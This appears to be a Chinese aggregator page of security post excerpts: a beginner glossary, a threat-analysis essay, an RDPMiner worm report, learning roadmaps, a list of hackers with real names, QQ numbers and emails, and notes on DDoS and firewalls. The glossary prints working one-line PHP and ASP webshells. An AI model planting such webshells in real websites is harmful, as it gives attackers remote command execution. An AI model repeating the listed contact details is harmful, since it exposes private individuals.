网络安全

安全入门常用术语

末鹿安然 提交于 2020-02-17 14:19:00
肉鸡 肉鸡也称傀儡机,是指可以被黑客远程控制的机器。通俗来讲就是中了木马或者留了后门,可以被黑客远程操纵的机器。 比如用"灰鸽子"等诱导客户点击或者电脑被黑客攻破或用户电脑有漏洞被种植了木马,黑客可以随意操纵它并利用它做任何事情。 webshell webshell就是以asp、jsp、php或cgi等网页文件形式存在的一种命令执行环境,也可以将其称作为一种网页后门(木马后门)。 中国菜刀 中国菜刀是一个非常好用而又十分强大的webshell。(仅仅听说,我也没用过) 一句话木马 一句话木马主要用来配合菜刀食用 php: <?php @ eval ( $_POST [ 'attack' ] ) ; ?> asp: < % eval request ( "attack" ) % > Customize:自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。 后门 后门(backdoor)一般指那些绕过安全性控制而获取对程序或系统访问权的方法。在软件开发阶段,程序员通常会在软件内留后门,方便以后修改程序设计中的缺陷。但如果这些后门被其他人知道,他就成为了安全风险,容易被黑客当成安全漏洞进行攻击。 归根结底目的是绕过安全控制,获取目标权限。 弱口令 弱口令(weak password) 例如123456,admin 等这些简单的

威胁分析

倖福魔咒の 提交于 2020-02-17 02:40:50
2020年1月17日 11:54 - 威胁分析 - 情报环模型 - 生成情报 - 建立调查 - 采集、处理数据 - 数据处理 - 富化信息 - 评估损害 - 生成情报 - 共享情报 - 反馈 威胁分析 威胁分析的目的是通过分析异常信息,生成可供事件响应模块使用的威胁情报。 安全分析在整个体系建设中的难点。原因在于不像安全基线和事件响应有明确的预期和肉眼可见的效果。威胁分析难以量化且是对使用者来说是个黑盒,使用者无法预料到威胁分析会有哪些产出物,以及对产出物没有衡量标准。 无论是采集到的网络行为、系统告警、未知md5,这些都是当前系统观测到的信息,这些信息或许能作为一个线头向下挖掘,但是实际挖掘过程中。入侵者可能已经建立了多个据点,也有可能只是误导防御方的佯攻。很有可能刚牵出线头线索就中断了。威胁分析模块基于这些蛛丝马迹的信息管中窥豹。所以大部分APT分析类的产品在演示时都展示得特别美好,而在使用后难有较好的效果。 威胁分析的算法和设计不是我擅长的。所以想讨论的内容还是威胁分析在安全自动化体系中的地位,和如何实现从数据->信息->情报->策略的工作流程。 一个情报从生成到被使用的全流程 数据 在建立安全基线的阶段,围绕资产生成了不少数据,包括资产的位置、资产的合规状态、资产的安全风险、资产已经配置的防护策略、资产的备份、恢复策略等,这些都是数据,在没有任何入侵活动发生的时候

威胁预警|首现新型RDPMiner挖矿蠕虫 受害主机易被添加恶意账户

半世苍凉 提交于 2020-02-15 23:29:00
近日,阿里云安全发现一种新型挖矿蠕虫RDPMiner,通过爆破Windows Server 3389端口RDP服务的方式进行挖矿木马传播,致使用户CPU占用率暴涨,机器卡顿,更被创建名为DefaultAccount的账号。攻击者可畅通无阻远程登录机器威胁用户业务和数据安全。 据该蠕虫连接的某矿池公布的HashRate,预估仅该矿池即有2000+机器连接进行挖矿,阿里云安全专家判断该挖矿蠕虫扩散性还在持续且活跃度高,且用户管理账号弱密码设置更给攻击者创造了有利的条件。 本文以RDPMiner整体攻击流程为主线,通过对入侵、获利、对抗与维持等进行详细分析,还原RDPMiner整个过程。并在文末给出专家建议,同时也提醒用户加强密码设置。 背景 在接到用户反馈Windows Server服务器CPU占用率暴涨,并被创建DefaultAccount的账号后,阿里云云防火墙同步监控到这些机器向外发出大量RDP请求。阿里云安全研究人员进行分析后,发现用户主机上运行着挖矿程序,导致CPU占用率居高不下。 进一步分析,攻击者利用该蠕虫程序暴力破解RDP服务、创建用户名为DefaultAccount的账号、修改注册表、开启挖矿程序。 接着再通过这台被入侵的机器对互联网其他主机进行爆破,进而达到入侵、获利、持久化等功能。 且挖矿蠕虫的攻击者具有较强的对抗意识

网络安全工程师学习路线汇总

半世苍凉 提交于 2020-02-13 11:24:48
随着互联网日益走进人们的衣食住行各个方面,网络安全也渐渐成为大众所关心重视的点。特别是依靠互联网发家的各大互联网企业,更是对网络安全十分看重。因此,网络安全防御型人才更是成为企业的抢手货,如:安全服务工程师、安全运维工程师,对于这方面的人才,公司在薪资上也是毫不吝啬,待遇极其丰厚。因此各行业将网络安全工程师纳入企业日常配置已成必然之势。 这也就意味着,学好网络安全,无论是对于自己的未来就业发展,抑或是提升自己的职场竞争力都是及其有用的。但是专业的网络安全工程师,到底需要具备什么技能呢?需要学习哪方面的知识点呢? 一、网络安全 网络基础 网络概述 (行业背景+就业方向+课程体系结构) Vmware IP地址的概述与应用 DOS命令与批处理 Windows服务安全 用户管理 破解系统用户密码 NTFS权限 文件服务器 DNS服务 DHCP服务 IIS服务 活动目录 域控管理 组策略(一) 组策略(二) 安全策略 PKI与证书服务 windows安全基线 Windows server 2003安全配置基线 阶段综合项目一 以太网交换与路由技术 回顾windows服务 OSI协议簇 交换机的基本原理与配置 IP包头分析与静态路由 分析ARP攻击与欺骗 虚拟局域网VLAN VTP 单臂路由与DHCP 子网划分VLSM 高级网络技术 回顾 三层交换 ACL-1 ACL-2 网络地址转换

学习进度总结(十二)

微笑、不失礼 提交于 2020-02-12 23:54:59
今天在kindle看了看关于黑客的文章,没有学习android的知识。 在了解这些网络安全方便的大佬之后,增强了我对信息安全方面的兴趣。那些黑客们对与“攻击”网站来达到增强网站的安全性的热情让我很佩服,我在书中也了解到了黑客大赛的相关知识,我想以后一定要看一看。我觉得网络安全更考验人的耐心,也是有好奇心的人的发展空间。比如支付宝他们的安全检测系统,让我改变了对支付宝的认识,以前我还总是对赚钱买东西啥的不妨先,但是了解了他们系统之后,他们的系统会对每次交易进行多次检验,但是检验的同时,我又学到了一个新的名词就是打扰率,我觉的应该就是对用户友好吧。简单来说就是你转钱的时候不能总是弹框来让你确认,这会让用户感到厌烦。 来源: https://www.cnblogs.com/mac-13/p/12301858.html

计算机网络——第一周:1.3网络核心(1)

会有一股神秘感。 提交于 2020-02-12 19:34:19
1、为什么需要数据交换? N²链路问题 :N台主机,两两相连,需要N*(N-1)/2条链路。 解决 :交换设备互连。 2、交换? (1)动态转接:交换设备将一个端口的数据转移到另一个端口; (2) 动态分配传输资源 :交换设备互连形成交换网络。 3、数据交换的类型: 电路交换; 报文交换; 分组交换。 4、电路交换的特点: 最典型的电路交换网络:电话网络。 电路交换的三个节点:建立连接;通信;释放连接。 最重要特点: 独占资源 。(无数据交换依然占用电路资源) => 电路交换网络中,每条电路独占其经过的物理链路。(错) 4、电路交换网络的链路共享? 电路交换网络如何共享中继线?—— 多路复用技术(Multiplexing) 。 来源: https://www.cnblogs.com/caihan/p/12300137.html

中国黑客名单

佐手、 提交于 2020-02-12 07:04:13
网名:bobo 真实姓名:*** oicq:28901964 电子信箱:*** 网站:*** 简介:网络安全产品专家,熟悉各种路由器、交换机、防火墙、ids、scaner,对网络安全整 体解决方案的提出有其独特的见解。 网名:小鱼巫师 真实姓名:曾庆荣 年龄:23 oicq:961060 电子信箱:z-q-r@此网址已经被屏蔽 网站:http;//www.rootcn.com/flyfish 简介:黑客新秀,有着丰富的编程经验和实战经验。他能够把黑客技术结合到实际编程中, 熟悉防火墙,喜欢音乐和文学。 网名:bigchen 真实姓名:*** 年龄:27 oicq:515365 电子信箱:cjfcom(AT)sohu.com 网站:http;//www.ujc081.chinaw3.com 简介:“坏蛋俱乐部”站长 网名:snake 真实姓名:赖洪昌 年龄:27 oicq:65528 电子信箱:hsnakes(AT)public.szptt.net.cn 网站:http;//snake.gnuchina.org 简介:编程水平一流,开发了许多优秀的安全软件及黑客软件,例如:snakescan、iis5 _idq、sksockserver等。 网名:独行客 真实姓名:王辉 年龄:** oicq:*** 电子信箱:ddxxkk(AT)21cn.com 网站:http;//www

三种保护数据手段解析

倾然丶 夕夏残阳落幕 提交于 2020-02-12 05:27:47
如何在开放的互联网海洋中保护好自己的数据资料,是所有用户关注的问题。从技术方面来看,完整的数据保护方案包括了数据保密、数据恢复以及数据删除等方面。各大数据安全和反病毒厂商都有不少解决方案,让我们从普通用户角度来分析,该如何保护数据。 方法一:事前防范 注意数据安全和保密 数据安全和保密包含了如何防止病毒和木马盗取用户资料,以及用户采用技术手段保护自己的重要数据。对于用户来说,主动防护病毒和木马入侵比感染病毒后再采取措施来得简单方便。世界各大反病毒厂商,比如诺顿、卡巴斯基以及NOD32等都推出各自的杀毒软件,国产的防病毒软件瑞星杀毒软件2008以金山毒霸等也都提供了从木马查杀到病毒主动防护的一整套完善的数据安全保护方案。除了安装防病毒软件外,对于提高自身安全意识,甚至超过了技术手段。对于重要的数据,应该养成使用加密软件以及USB加密锁等保护措施的习惯。 方法二:文件被删 选择数据恢复 有道是“人有失手,马有失蹄”,假如在安装了病毒防火墙后还是不幸被病毒和木马入侵了电脑,而导致数据被删除,或者机器软硬件故障等带来的数据丢失,以及误删除了一些重要文件,这时,我们就需要专业的数据恢复软件来一展身手了。比较常见的数据恢复软件有:EasyRecovery、Recover4all和FinalRecovery,它们都提供了方式多样的数据扫描和恢复方案。当然,如果使用不当

租用普通服务器该如何限制doos攻击预防方法

老子叫甜甜 提交于 2020-02-10 14:04:32
高防服务器租用的用户在抵御ddos攻击中相对容易,因为有机房防御和服务器自身防御,还有技术保驾护航。普通服务器租用用户也不用气馁,面对有可能出现的DDOS攻击,做到以下几种预防准备的话,也是可以较为容易应对的。      (1)定期扫描      要定期扫描现有的网络主节点,清查可能存在的安全漏洞,对新出现的漏洞及时进行清理。骨干节点的计算机因为具有较高的带宽,是黑客利用的最佳位置,因此对这些服务器本身加强主机安全是非常重要的。而且连接到网络主节点的都是服务器级别的计算机,所以定期扫描漏洞就变得更加重要了。      (2)在骨干节点配置防火墙      防火墙本身能抵御DdoS攻击和其他一些攻击。在发现受到攻击的时候,可以将攻击导向一些牺牲主机,这样可以保护真正的主机不被攻击。当然导向的这些牺牲主机可以选择不重要的,或者是linux以及unix等漏洞少和天生防范攻击优秀的系统。      (3)用足够的机器承受黑客攻击      这是一种较为理想的应对策略。如果用户拥有足够的容量和足够的资源给黑客攻击,在它不断访问用户、夺取用户资源之时,自己的能量也在逐渐耗失,或许未等用户被攻死,黑客已无力支招儿了。不过此方法需要投入的资金比较多,平时大多数设备处于空闲状态,和目前中小企业网络实际运行情况不相符。      (4)充分利用网络设备保护网络资源      所谓网络设备是指路由器

防火墙和系统安全防护和优化

百般思念 提交于 2020-02-10 08:19:08
防火墙和系统安全防护和优化 什么是防火墙?    所谓防火墙指的是一个由软件和硬件设备组合而成、在内部网和外部网之间、专用网与公共网之间的界面上构造的保护屏障.是一种获取安全性方法的形象说法,它是一种计算机硬件和软件的结合,使Internet与Intranet之间建立起一个安全网关(Security Gateway),从而保护内部网免受非法用户的侵入,防火墙主要由服务访问规则、验证工具、包过滤和应用网关4个部分组成,防火墙就是一个位于计算机和它所连接的网络之间的软件或硬件。该计算机流入流出的所有网络通信和数据包均要经过此防火墙。 防火墙是在两个网络通讯时执行的一种访问控制尺度,能最大限度阻止网络中的黑客访问你的网络。是指设置在不同网络(如可信任的企业内部网和不可信的公共网)或网络安全域之间的一系列部件的组合。它是不同网络或网络安全域之间信息的唯一出入口,能根据企业的安全政策控制(允许、拒绝、监测)出入网络的信息流,且本身具有较强的抗攻击能力。它是提供信息安全服务,实现网络和信息安全的基础设施。在逻辑上,防火墙是一个分离器,一个限制器,也是一个分析器,有效地监控了内部网和Internet之间的任何活动,保证了内部网络的安全。 防护墙有什么功能? 1、入侵检测功能 网络防火墙技术的主要功能之一就是入侵检测功能,主要有反端口扫描、检测拒绝服务工具、检测CGI/IIS服务器入侵